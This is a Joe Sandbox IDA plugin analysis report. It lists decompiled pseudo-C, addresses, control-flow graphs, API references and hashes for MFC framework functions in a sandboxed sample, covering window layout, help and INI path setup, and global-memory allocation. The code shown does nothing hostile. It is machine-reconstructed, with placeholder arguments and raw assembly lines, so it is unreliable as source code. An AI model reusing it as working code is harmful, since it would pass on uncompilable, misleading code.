									if(_v20 != 0) {
										goto L74;
									}
									L59:
									 *((intOrPtr*)( *_t341 + 0x16c))( &_v128);
									goto L74;
								}
								_t211 =  *(_t341 + 0x84);
								if((_t211 & 0x00000004) == 0 || (_t211 & 0x00000001) == 0) {
									asm("sbb eax, eax");
									_t215 = ( ~(_t211 & 0x0000a000) & 0xfffffffa) + 0x10;
									__eflags = _t215;
								} else {
									_t215 = 6;
								}
								 *((intOrPtr*)( *_t341 + 0x140))( &_v40, 0xffffffff, _t215);
								E0041335B( &_v64, _t287, _t350, _v40, _v36);
								GetWindowRect( *(_t341 + 0x20),  &_v80);
								E00422BFB(_v8,  &_v80);
								if(_a12 == 0) {
									_t223 = _v80.top;
									__eflags = _t223 - _v64.top;
									if(_t223 > _v64.top) {
										_t322 = _v8;
										__eflags =  *(_t322 + 0x98);
										if( *(_t322 + 0x98) == 0) {
											_t249 = _t223 - _v64.top;
											__eflags = _t249;
											OffsetRect( &_v64, 0, _t249);
										}
									}
									_t224 = _v64.bottom;
									_t313 = _v28;
									__eflags = _t224 - _t313;
									if(_t224 > _t313) {
										_t336 = _v8;
										__eflags =  *(_t336 + 0x98);
										if( *(_t336 + 0x98) == 0) {
											_t321 = _t313 - _t224 - _v64.top -  *0x466524;
											__eflags = _t321 - _t350;
											_t245 = _t321;
											if(_t321 <= _t350) {
												_t245 = _t350;
											}
											_t246 = _t245 - _v64.top;
											__eflags = _t246;
											OffsetRect( &_v64, 0, _t246);
										}
									}
									__eflags = _v20;
									if(_v20 == 0) {
										__eflags = _v64.top - _v28 -  *0x466524;
										if(_v64.top < _v28 -  *0x466524) {
											goto L51;
										}
										__eflags = _v12;
										if(_v12 <= 0) {
											goto L51;
										}
										_t238 = E0040B917(_v8 + 0x9c, _v12 - 1);
										__eflags =  *_t238;
										if( *_t238 != 0) {
											goto L37;
										}
										goto L51;
									} else {
										_t240 =  *0x466524; // 0x2
										_v20 = _v20 & 0x00000000;
										OffsetRect( &_v64, 0,  ~(_v64.top + _t240));
										L51:
										_t229 = EqualRect( &_v64,  &_v80);
										__eflags = _t229;
										if(_t229 == 0) {
											_t231 = _v8;
											__eflags =  *(_t231 + 0xb0);
											if( *(_t231 + 0xb0) == 0) {
												__eflags =  *(_t341 + 0x84) & 0x00000001;
												if(( *(_t341 + 0x84) & 0x00000001) == 0) {
													_t235 = _v24;
													__eflags =  *((intOrPtr*)(_t235 + 0x94)) + 0x94;
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													_t341 = _t235;
												}
											}
											E0040CEE2( &_v128,  *(_t341 + 0x20),  &_v64);
										}
										_t230 = _v40;
										_t350 = _v64.top -  *0x466524 + _v36;
										__eflags = _v16 - _t230;
										_v44 = _t350;
										if(_v16 > _t230) {
											goto L59;
										} else {
											_v16 = _t230;
											goto L58;
										}
									}
								} else {
									_t252 = _v80.left;
									if(_t252 > _v64.left &&  *((intOrPtr*)(_v8 + 0x98)) == 0) {
										OffsetRect( &_v64, _t252 - _v64.left, 0);
									}
									_t253 = _v64.right;
									_t323 = _v32;
									if(_t253 > _t323 &&  *((intOrPtr*)(_v8 + 0x98)) == 0) {
										OffsetRect( &_v64, _t275 - _v64.left, 0);
									}
									if(_v20 == 0) {
										__eflags = _v64.left - _v32 -  *0x466520;
										if(_v64.left < _v32 -  *0x466520) {
											goto L27;
										}
										__eflags = _v12;
										if(_v12 <= 0) {
											goto L27;
										}
										_t267 = E0040B917(_v8 + 0x9c, _v12 - 1);
										__eflags =  *_t267;
										if( *_t267 == 0) {
											goto L27;
										}
										L37:
										_push(1);
										_push(0);
										E004260F4(_t287, _v8 + 0x9c, 1, _v12);
										_v20 = 1;
										goto L61;
									} else {
										_t268 =  *0x466520; // 0x2
										_v20 = _v20 & 0x00000000;
										OffsetRect( &_v64,  ~(_t268 + _v64.left), 0);
										L27:
										if(EqualRect( &_v64,  &_v80) == 0) {
											if( *((intOrPtr*)(_v8 + 0xb0)) == 0 && ( *(_t341 + 0x84) & 0x00000001) == 0) {
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t350 = _v44;
												_t341 = _v24;
											}
											E0040CEE2( &_v128,  *(_t341 + 0x20),  &_v64);
										}
										_t259 = _v36;
										_t287 = _v40 -  *0x466520 + _v64.left;
										if(_v16 <= _t259) {
											_v16 = _t259;
										}
										goto L59;
									}
								}
								L74:
								_v12 = _v12 + 1;
								_t199 = _v8;
							} while (_v12 <  *((intOrPtr*)(_t199 + 0xa4)));
							_t340 = _t199;
							_t187 = 0;
							goto L76;
						}
					}
				}
				L1:
				E00406436(_t285, _t291, _t338, _t348, _t357);
				goto L2;
			}






































































                  0x00413b62
                  0x00413b6b
                  0x00413b6f
                  0x00413b72
                  0x00413b74
                  0x00413b7b
                  0x00413b84
                  0x00413b89
                  0x00413b98
                  0x00413bc0
                  0x00413bc2
                  0x00413bc7
                  0x00413bc9
                  0x00000000
                  0x00413bcb
                  0x00413bd2
                  0x00413bde
                  0x00413be1
                  0x00413be1
                  0x00000000
                  0x00413be1
                  0x00413b9a
                  0x00413ba2
                  0x00413ba3
                  0x00413ba4
                  0x00413bab
                  0x00413bac
                  0x00413bb8
                  0x00413bbb
                  0x00413be4
                  0x00413beb
                  0x00413bee
                  0x00413bf1
                  0x00413c05
                  0x00413bf3
                  0x00413bf3
                  0x00413bf3
                  0x00413c08
                  0x00413c0e
                  0x00413c14
                  0x00413c17
                  0x00413c19
                  0x00413c1b
                  0x00413c23
                  0x00413c26
                  0x00413c29
                  0x00413c2c
                  0x00413c2f
                  0x00413fd9
                  0x00413fd9
                  0x00413fe2
                  0x00413fec
                  0x00413fec
                  0x00413ff6
                  0x00414007
                  0x00414012
                  0x00414019
                  0x0041401d
                  0x00414027
                  0x00414027
                  0x0041401d
                  0x0041402c
                  0x00414033
                  0x00414038
                  0x00414042
                  0x00414042
                  0x00414038
                  0x0041404b
                  0x00413c35
                  0x00413c35
                  0x00413c46
                  0x00413c4e
                  0x00413c56
                  0x00413c5a
                  0x00413f52
                  0x00413f54
                  0x00000000
                  0x00000000
                  0x00413f56
                  0x00413f56
                  0x00413f5a
                  0x00413f5c
                  0x00413f60
                  0x00413f63
                  0x00413f66
                  0x00413f99
                  0x00413f9b
                  0x00413f9d
                  0x00413f9f
                  0x00413fa1
                  0x00413fa1
                  0x00413fa3
                  0x00413fa5
                  0x00413fa8
                  0x00413faa
                  0x00413fac
                  0x00413fac
                  0x00413fae
                  0x00413fb1
                  0x00413fb7
                  0x00413fb9
                  0x00413f68
                  0x00413f6e
                  0x00413f70
                  0x00413f72
                  0x00413f74
                  0x00413f77
                  0x00413f79
                  0x00413f79
                  0x00413f7b
                  0x00413f7e
                  0x00413f80
                  0x00413f82
                  0x00413f84
                  0x00413f84
                  0x00413f86
                  0x00413f89
                  0x00413f8f
                  0x00413f8f
                  0x00413fbc
                  0x00413fbc
                  0x00413fbc
                  0x00413fbc
                  0x00000000
                  0x00413f5a
                  0x00413c6c
                  0x00413f3c
                  0x00413f3c
                  0x00413f40
                  0x00000000
                  0x00000000
                  0x00413f42
                  0x00413f4a
                  0x00000000
                  0x00413f4a
                  0x00413c72
                  0x00413c7a
                  0x00413c8c
                  0x00413c91
                  0x00413c91
                  0x00413c80
                  0x00413c82
                  0x00413c82
                  0x00413c9f
                  0x00413cb0
                  0x00413cbc
                  0x00413cc9
                  0x00413cd2
                  0x00413e21
                  0x00413e24
                  0x00413e27
                  0x00413e29
                  0x00413e2c
                  0x00413e33
                  0x00413e35
                  0x00413e35
                  0x00413e3f
                  0x00413e3f
                  0x00413e33
                  0x00413e45
                  0x00413e48
                  0x00413e4b
                  0x00413e4d
                  0x00413e4f
                  0x00413e52
                  0x00413e59
                  0x00413e64
                  0x00413e66
                  0x00413e68
                  0x00413e6a
                  0x00413e6c
                  0x00413e6c
                  0x00413e6e
                  0x00413e6e
                  0x00413e78
                  0x00413e78
                  0x00413e59
                  0x00413e7e
                  0x00413e82
                  0x00413eac
                  0x00413eaf
                  0x00000000
                  0x00000000
                  0x00413eb1
                  0x00413eb5
                  0x00000000
                  0x00000000
                  0x00413ec5
                  0x00413eca
                  0x00413ecd
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00413e84
                  0x00413e84
                  0x00413e8c
                  0x00413e9b
                  0x00413ed3
                  0x00413edb
                  0x00413ee1
                  0x00413ee3
                  0x00413ee5
                  0x00413ee8
                  0x00413eef
                  0x00413ef1
                  0x00413ef8
                  0x00413efa
                  0x00413f03
                  0x00413f0c
                  0x00413f0d
                  0x00413f0e
                  0x00413f0f
                  0x00413f10
                  0x00413f10
                  0x00413ef8
                  0x00413f1d
                  0x00413f1d
                  0x00413f2b
                  0x00413f2e
                  0x00413f31
                  0x00413f34
                  0x00413f37
                  0x00000000
                  0x00413f39
                  0x00413f39
                  0x00000000
                  0x00413f39
                  0x00413f37
                  0x00413cd8
                  0x00413cd8
                  0x00413cde
                  0x00413cf6
                  0x00413cf6
                  0x00413cfc
                  0x00413cff
                  0x00413d04
                  0x00413d2f
                  0x00413d2f
                  0x00413d39
                  0x00413dd7
                  0x00413dda
                  0x00000000
                  0x00000000
                  0x00413ddc
                  0x00413de0
                  0x00000000
                  0x00000000
                  0x00413df4
                  0x00413df9
                  0x00413dfc
                  0x00000000
                  0x00000000
                  0x00413e02
                  0x00413e08
                  0x00413e09
                  0x00413e14
                  0x00413e19
                  0x00000000
                  0x00413d3f
                  0x00413d3f
                  0x00413d47
                  0x00413d56
                  0x00413d5c
                  0x00413d6c
                  0x00413d78
                  0x00413d95
                  0x00413d96
                  0x00413d97
                  0x00413d98
                  0x00413d99
                  0x00413d9c
                  0x00413d9c
                  0x00413da9
                  0x00413da9
                  0x00413db7
                  0x00413dba
                  0x00413dc0
                  0x00413dc6
                  0x00413dc6
                  0x00000000
                  0x00413dc0
                  0x00413d39
                  0x00413fc0
                  0x00413fc0
                  0x00413fc3
                  0x00413fc9
                  0x00413fd5
                  0x00413fd7
                  0x00000000
                  0x00413fd7
                  0x00413c2f
                  0x00413b98
                  0x00413b76
                  0x00413b76
                  0x00000000

                  APIs
                  • IsRectEmpty.USER32 ref: 00413B90
                  • GetWindowRect.USER32 ref: 00413CBC
                    • Part of subcall function 00406436: __CxxThrowException@8.LIBCMT ref: 0040644C
                    • Part of subcall function 00406436: __EH_prolog3.LIBCMT ref: 00406459
                  • GetClientRect.USER32 ref: 00413BD2
                  • BeginDeferWindowPos.USER32 ref: 00413BFF
                  • OffsetRect.USER32(?,?,00000000), ref: 00413CF6
                  • OffsetRect.USER32(?,?,00000000), ref: 00413D2F
                  • OffsetRect.USER32(?,00000002,00000000), ref: 00413D56
                  • EqualRect.USER32 ref: 00413D64
                  • OffsetRect.USER32(?,00000000,?), ref: 00413E3F
                  • OffsetRect.USER32(?,00000000,?), ref: 00413E78
                  • OffsetRect.USER32(?,00000000,?), ref: 00413E9B
                  • EqualRect.USER32 ref: 00413EDB
                  • KiUserCallbackDispatcher.NTDLL(?), ref: 00413FEC
                  • SetRectEmpty.USER32(?), ref: 00413FF6
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Rect$Offset$EmptyEqualWindow$BeginCallbackClientDeferDispatcherException@8H_prolog3ThrowUser
                  • String ID:
                  • API String ID: 3576052098-0
                  • Opcode ID: d683042e509441e1f4c974bac9cc01ab42b27de317ac2ed517fd49ba6fe9a68c
                  • Instruction ID: 5a4b077b88add1b12872ffce2bc9f70bb062d40a4a35f0a38eb10edef1dfd08d
                  • Opcode Fuzzy Hash: d683042e509441e1f4c974bac9cc01ab42b27de317ac2ed517fd49ba6fe9a68c
                  • Instruction Fuzzy Hash: 48022831E00209EFDF14CFA8D984BEEBBB5BF08306F14416AE515E7251D778AA81CB58
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0042FE1C, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 122COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 303 42fe1c-42fe61 call 41f363 GetModuleFileNameA 306 42fe63-42fe65 303->306 307 42fe67 call 42282a 303->307 306->307 308 42fe6c-42fe81 PathFindExtensionA 306->308 307->308 310 42fe83 call 42282a 308->310 311 42fe88-42fea7 call 42fddc 308->311 310->311 315 42fea9 call 42282a 311->315 316 42feae-42feb2 311->316 315->316 317 42feb4-42fec6 call 433ccf 316->317 318 42fecd-42fed2 316->318 317->318 329 42fec8 call 4063fe 317->329 321 42ff07-42ff0e 318->321 322 42fed4-42feec call 41b239 318->322 325 42ff10-42ff1d 321->325 326 42ff5b-42ff5f 321->326 336 42fef7 322->336 337 42feee-42fef5 322->337 327 42ff26 325->327 328 42ff1f-42ff24 325->328 331 42ff93-42ffa1 call 430650 326->331 332 42ff61-42ff8d call 4317a1 call 4048c1 call 433ccf 326->332 333 42ff2b-42ff4c call 414fee call 433ccf 327->333 328->333 329->318 332->329 332->331 333->329 351 42ff52-42ff58 333->351 341 42fefa-42ff05 call 433ccf 336->341 337->341 341->321 341->329 351->326
                  C-Code - Quality: 62%
                  			E0042FE1C(void* __ecx, void* __edx, void* __eflags) {
				signed int _v8;
				char _v268;
				char _v528;
				char _v784;
				char* _v788;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t35;
				long _t41;
				char* _t44;
				void* _t57;
				intOrPtr _t60;
				intOrPtr _t65;
				void* _t68;
				void* _t70;
				void* _t74;
				void* _t75;
				void* _t76;
				void* _t77;
				void* _t79;
				void* _t80;
				signed int _t84;
				void* _t85;

				_t74 = __edx;
				_t71 = __ecx;
				_t82 = _t84;
				_t85 = _t84 - 0x310;
				_t35 =  *0x463404; // 0x18eab29f
				_v8 = _t35 ^ _t84;
				_push(_t68);
				_push(_t75);
				_t79 = __ecx;
				_t76 = E0041F363(_t68, _t75, __ecx, __eflags);
				 *(_t76 + 8) =  *(_t79 + 0x44);
				 *(_t76 + 0xc) =  *(_t79 + 0x44);
				_t41 = GetModuleFileNameA( *(_t79 + 0x44),  &_v268, 0x104);
				if(_t41 == 0 || _t41 == 0x104) {
					E0042282A(_t71);
				}
				_t44 = PathFindExtensionA( &_v268); // executed
				_v788 = _t44;
				if(_t44 == 0) {
					E0042282A(_t71);
				}
				 *_v788 = 0;
				if(E0042FDDC( &_v268,  &_v528, 0x104) != 0) {
					E0042282A(_t71);
				}
				if( *((intOrPtr*)(_t79 + 0x60)) == 0) {
					_t65 = E00433CCF( &_v528);
					_pop(_t71);
					 *((intOrPtr*)(_t79 + 0x60)) = _t65;
					_t93 = _t65;
					if(_t65 == 0) {
						L10:
						E004063FE(0x104, _t71, _t76, _t79, _t93);
					}
				}
				_t49 =  *((intOrPtr*)(_t79 + 0x50));
				if(_t49 == 0) {
					if(E0041B239(0x104, _t71, _t76, _t79, 0xe000,  &_v784, 0x100) == 0) {
						_push( *((intOrPtr*)(_t79 + 0x60)));
					} else {
						_push( &_v784);
					}
					_t49 = E00433CCF();
					 *((intOrPtr*)(_t79 + 0x50)) = _t49;
					_pop(_t71);
					if(_t49 == 0) {
						goto L10;
					}
				}
				 *((intOrPtr*)(_t76 + 0x10)) = _t49;
				if( *((intOrPtr*)(_t79 + 0x64)) == 0) {
					_t57 =  &_v8 - _v788;
					if( *((intOrPtr*)(_t79 + 0x6c)) != 1) {
						_push(".HLP");
					} else {
						_push(".CHM");
					}
					_push(_t57);
					_push(_v788);
					E00414FEE(0x104, _t74, _t76, _t79);
					_t85 = _t85 + 0xc;
					_t60 = E00433CCF( &_v268);
					_pop(_t71);
					 *((intOrPtr*)(_t79 + 0x64)) = _t60;
					if(_t60 == 0) {
						goto L10;
					} else {
						_t49 = _v788;
						 *_v788 = 0;
					}
				}
				if( *((intOrPtr*)(_t79 + 0x68)) == 0) {
					E004048C1(0x104, _t71, _t76, _t79, E004317A1(_t74,  &_v528, 0x104, ".INI"));
					_t49 = E00433CCF( &_v528);
					_t85 = _t85 + 0x14;
					 *((intOrPtr*)(_t79 + 0x68)) = _t49;
					if(_t49 == 0) {
						goto L10;
					}
				}
				_pop(_t77);
				_pop(_t80);
				_pop(_t70);
				return E00430650(_t49, _t70, _v8 ^ _t82, _t74, _t77, _t80);
			}




























                  0x0042fe1c
                  0x0042fe1c
                  0x0042fe1f
                  0x0042fe21
                  0x0042fe27
                  0x0042fe2e
                  0x0042fe31
                  0x0042fe33
                  0x0042fe34
                  0x0042fe3b
                  0x0042fe40
                  0x0042fe46
                  0x0042fe59
                  0x0042fe61
                  0x0042fe67
                  0x0042fe67
                  0x0042fe73
                  0x0042fe79
                  0x0042fe81
                  0x0042fe83
                  0x0042fe83
                  0x0042fe8e
                  0x0042fea7
                  0x0042fea9
                  0x0042fea9
                  0x0042feb2
                  0x0042febb
                  0x0042fec0
                  0x0042fec1
                  0x0042fec4
                  0x0042fec6
                  0x0042fec8
                  0x0042fec8
                  0x0042fec8
                  0x0042fec6
                  0x0042fecd
                  0x0042fed2
                  0x0042feec
                  0x0042fef7
                  0x0042feee
                  0x0042fef4
                  0x0042fef4
                  0x0042fefa
                  0x0042feff
                  0x0042ff02
                  0x0042ff05
                  0x00000000
                  0x00000000
                  0x0042ff05
                  0x0042ff07
                  0x0042ff0e
                  0x0042ff13
                  0x0042ff1d
                  0x0042ff26
                  0x0042ff1f
                  0x0042ff1f
                  0x0042ff1f
                  0x0042ff2b
                  0x0042ff2c
                  0x0042ff32
                  0x0042ff3d
                  0x0042ff41
                  0x0042ff46
                  0x0042ff47
                  0x0042ff4c
                  0x00000000
                  0x0042ff52
                  0x0042ff52
                  0x0042ff58
                  0x0042ff58
                  0x0042ff4c
                  0x0042ff5f
                  0x0042ff74
                  0x0042ff80
                  0x0042ff85
                  0x0042ff88
                  0x0042ff8d
                  0x00000000
                  0x00000000
                  0x0042ff8d
                  0x0042ff96
                  0x0042ff97
                  0x0042ff9a
                  0x0042ffa1

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: __strdup$ExtensionFileFindModuleNamePath_strcat_s
                  • String ID: .CHM$.HLP$.INI
                  • API String ID: 1153805871-4017452060
                  • Opcode ID: 5a2cfcf0a266f3ba9807a91fb32b2f27e91d7bb497108997dc917048d7d32576
                  • Instruction ID: ddaf0331e0f280528f6596423df915eadd577d6b01de0391df7aa35ddabab8c3
                  • Opcode Fuzzy Hash: 5a2cfcf0a266f3ba9807a91fb32b2f27e91d7bb497108997dc917048d7d32576
                  • Instruction Fuzzy Hash: 6E417571A003199BDB21EF65DD45B9BB7FCAF08305F90097BE445D2252EB78DA84CB14
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 004206EA, Relevance: 16.6, APIs: 11, Instructions: 106memoryCOMMONLIBRARYCODE
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 353 4206ea-42070b EnterCriticalSection 354 42071a-42071f 353->354 355 42070d-420714 353->355 357 420721-420724 354->357 358 42073c-420744 354->358 355->354 356 4207d8-4207db 355->356 360 4207e3-420801 LeaveCriticalSection 356->360 361 4207dd-4207e0 356->361 359 420727-42072a 357->359 362 420746-420759 call 4148c1 GlobalAlloc 358->362 363 42075b-42077f GlobalHandle GlobalUnlock call 4148c1 GlobalReAlloc 358->363 364 420734-420736 359->364 365 42072c-420732 359->365 361->360 370 420785-420787 362->370 363->370 364->356 364->358 365->359 365->364 371 420789-42078e 370->371 372 4207ac-4207d5 GlobalLock call 431160 370->372 373 420790-420798 GlobalHandle GlobalLock 371->373 374 42079e-4207a7 LeaveCriticalSection call 4063fe 371->374 372->356 373->374 374->372
                  C-Code - Quality: 90%
                  			E004206EA(void* __ecx) {
				struct _CRITICAL_SECTION* _v8;
				void* _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				struct _CRITICAL_SECTION* _t34;
				void* _t35;
				void* _t36;
				long _t38;
				void* _t39;
				void* _t40;
				long _t51;
				signed char* _t53;
				intOrPtr _t56;
				signed int _t57;
				void* _t61;
				signed int _t68;
				void* _t72;

				_t59 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t72 = __ecx;
				_t1 = _t72 + 0x1c; // 0x466584
				_t34 = _t1;
				_v8 = _t34;
				EnterCriticalSection(_t34);
				_t3 = _t72 + 4; // 0x20
				_t56 =  *_t3;
				_t4 = _t72 + 8; // 0x3
				_t68 =  *_t4;
				if(_t68 >= _t56) {
					L2:
					_t68 = 1;
					if(_t56 <= 1) {
						L7:
						_t13 = _t72 + 0x10; // 0x5b88a8
						_t35 =  *_t13;
						_t57 = _t56 + 0x20;
						_t83 = _t35;
						if(_t35 != 0) {
							_t36 = GlobalHandle(_t35);
							_v12 = _t36;
							GlobalUnlock(_t36);
							_t38 = E004148C1(_t59, __eflags, _t57, 8);
							_t61 = 0x2002;
							_t39 = GlobalReAlloc(_v12, _t38, ??);
						} else {
							_t51 = E004148C1(_t59, _t83, _t57, 8);
							_pop(_t61);
							_t39 = GlobalAlloc(2, _t51); // executed
						}
						if(_t39 == 0) {
							_t16 = _t72 + 0x10; // 0x5b88a8
							_t72 =  *_t16;
							_t85 = _t72;
							if(_t72 != 0) {
								GlobalLock(GlobalHandle(_t72));
							}
							LeaveCriticalSection(_v8);
							_t39 = E004063FE(_t57, _t61, _t68, _t72, _t85);
						}
						_t40 = GlobalLock(_t39);
						_t18 = _t72 + 4; // 0x20
						_v12 = _t40;
						E00431160(_t68, _t40 +  *_t18 * 8, 0, _t57 -  *_t18 << 3);
						 *(_t72 + 4) = _t57;
						 *(_t72 + 0x10) = _v12;
					} else {
						_t10 = _t72 + 0x10; // 0x5b88a8
						_t53 =  *_t10 + 8;
						while(( *_t53 & 0x00000001) != 0) {
							_t68 = _t68 + 1;
							_t53 =  &(_t53[8]);
							if(_t68 < _t56) {
								continue;
							}
							break;
						}
						if(_t68 >= _t56) {
							goto L7;
						}
					}
				} else {
					_t5 = _t72 + 0x10; // 0x5b88a8
					if(( *( *_t5 + _t68 * 8) & 0x00000001) != 0) {
						goto L2;
					}
				}
				_t25 = _t72 + 0xc; // 0x3
				if(_t68 >=  *_t25) {
					_t26 = _t68 + 1; // 0x4
					 *((intOrPtr*)(_t72 + 0xc)) = _t26;
				}
				_t28 = _t72 + 0x10; // 0x5b88a8
				 *( *_t28 + _t68 * 8) =  *( *_t28 + _t68 * 8) | 0x00000001;
				_t32 = _t68 + 1; // 0x4
				 *(_t72 + 8) = _t32;
				LeaveCriticalSection(_v8);
				return _t68;
			}






















                  0x004206ea
                  0x004206ef
                  0x004206f0
                  0x004206f3
                  0x004206f5
                  0x004206f5
                  0x004206fa
                  0x004206fd
                  0x00420703
                  0x00420703
                  0x00420706
                  0x00420706
                  0x0042070b
                  0x0042071a
                  0x0042071c
                  0x0042071f
                  0x0042073c
                  0x0042073c
                  0x0042073c
                  0x0042073f
                  0x00420742
                  0x00420744
                  0x0042075c
                  0x00420763
                  0x00420766
                  0x00420774
                  0x0042077a
                  0x0042077f
                  0x00420746
                  0x00420749
                  0x0042074f
                  0x00420753
                  0x00420753
                  0x00420787
                  0x00420789
                  0x00420789
                  0x0042078c
                  0x0042078e
                  0x00420798
                  0x00420798
                  0x004207a1
                  0x004207a7
                  0x004207a7
                  0x004207ad
                  0x004207b3
                  0x004207be
                  0x004207c7
                  0x004207d2
                  0x004207d5
                  0x00420721
                  0x00420721
                  0x00420724
                  0x00420727
                  0x0042072c
                  0x0042072d
                  0x00420732
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00420732
                  0x00420736
                  0x00000000
                  0x00000000
                  0x00420736
                  0x0042070d
                  0x0042070d
                  0x00420714
                  0x00000000
                  0x00000000
                  0x00420714
                  0x004207d8
                  0x004207db
                  0x004207dd
                  0x004207e0
                  0x004207e0
                  0x004207e3
                  0x004207ec
                  0x004207ef
                  0x004207f2
                  0x004207f5
                  0x00420801

                  APIs
                  • EnterCriticalSection.KERNEL32(00466584,?,?,?,00466568,00466568,?,00420B40,00000004,0041F372,00406452,00411FA3), ref: 004206FD
                  • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,00466568,00466568,?,00420B40,00000004,0041F372,00406452,00411FA3), ref: 00420753
                  • GlobalHandle.KERNEL32 ref: 0042075C
                  • GlobalUnlock.KERNEL32(00000000,?,?,?,00466568,00466568,?,00420B40,00000004,0041F372,00406452,00411FA3), ref: 00420766
                  • GlobalReAlloc.KERNEL32(00406452,00000000,00002002), ref: 0042077F
                  • GlobalHandle.KERNEL32 ref: 00420791
                  • GlobalLock.KERNEL32 ref: 00420798
                  • LeaveCriticalSection.KERNEL32(00411FA3,?,?,?,00466568,00466568,?,00420B40,00000004,0041F372,00406452,00411FA3), ref: 004207A1
                  • GlobalLock.KERNEL32 ref: 004207AD
                  • _memset.LIBCMT ref: 004207C7
                  • LeaveCriticalSection.KERNEL32(00411FA3,0041F372,00406452,00411FA3), ref: 004207F5
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock_memset
                  • String ID:
                  • API String ID: 496899490-0
                  • Opcode ID: 23f39eb05e2f5900db8e0de7ebe0022c99c89241aa9ce15b00d395ab25b9ed35
                  • Instruction ID: df76cc218ce0eed47cdce916ccd5606461eaefea175fd580b96fa8a2acb9575c
                  • Opcode Fuzzy Hash: 23f39eb05e2f5900db8e0de7ebe0022c99c89241aa9ce15b00d395ab25b9ed35
                  • Instruction Fuzzy Hash: FA31DC75600714AFD7209F6AEC89A5ABBF9FF84304B00492EE942D3661DB74F8408F18
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00410B6D, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91COMMON
                  Download Yara Rule

                  Control-flow Graph

                  C-Code - Quality: 96%
                  			E00410B6D(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				_Unknown_base(*)()* _t31;
				void* _t33;
				void* _t34;
				long _t39;
				void* _t40;
				void* _t43;
				void* _t61;
				void* _t65;
				struct HWND__* _t67;
				CHAR* _t69;
				void* _t72;

				_t65 = __edx;
				_t61 = __ecx;
				_push(0x40);
				E00431ACE(E0044B0B7, __ebx, __edi, __esi);
				_t67 =  *(_t72 + 8);
				_t69 = "AfxOldWndProc423";
				_t31 = GetPropA(_t67, _t69);
				 *(_t72 - 0x14) =  *(_t72 - 0x14) & 0x00000000;
				 *(_t72 - 4) =  *(_t72 - 4) & 0x00000000;
				 *(_t72 - 0x18) = _t31;
				_t59 = 1;
				_t33 =  *(_t72 + 0xc) - 6;
				if(_t33 == 0) {
					_t34 = E0040EE3C(1, _t61,  *(_t72 + 0x14));
					E00410A7D(_t61, E0040EE3C(1, _t61, _t67),  *(_t72 + 0x10), _t34);
					goto L9;
				} else {
					_t40 = _t33 - 0x1a;
					if(_t40 == 0) {
						_t59 = 0 | E00410AF5(1, _t67, E0040EE3C(1, _t61, _t67),  *(_t72 + 0x14),  *(_t72 + 0x14) >> 0x10) == 0x00000000;
						L9:
						if(_t59 != 0) {
							goto L10;
						}
					} else {
						_t43 = _t40 - 0x62;
						if(_t43 == 0) {
							SetWindowLongA(_t67, 0xfffffffc,  *(_t72 - 0x18));
							RemovePropA(_t67, _t69);
							GlobalDeleteAtom(GlobalFindAtomA(_t69) & 0x0000ffff);
							goto L10;
						} else {
							if(_t43 != 0x8e) {
								L10:
								_t39 = CallWindowProcA( *(_t72 - 0x18), _t67,  *(_t72 + 0xc),  *(_t72 + 0x10),  *(_t72 + 0x14)); // executed
								 *(_t72 - 0x14) = _t39;
							} else {
								E0040D7C1(E0040EE3C(1, _t61, _t67), _t72 - 0x30, _t72 - 0x20);
								 *(_t72 - 0x14) = CallWindowProcA( *(_t72 - 0x18), _t67, 0x110,  *(_t72 + 0x10),  *(_t72 + 0x14));
								E0040F5B7(1, _t65, _t50, _t72 - 0x30,  *((intOrPtr*)(_t72 - 0x20)));
							}
						}
					}
				}
				return E00431B73( *(_t72 - 0x14));
			}














                  0x00410b6d
                  0x00410b6d
                  0x00410b6d
                  0x00410b74
                  0x00410b79
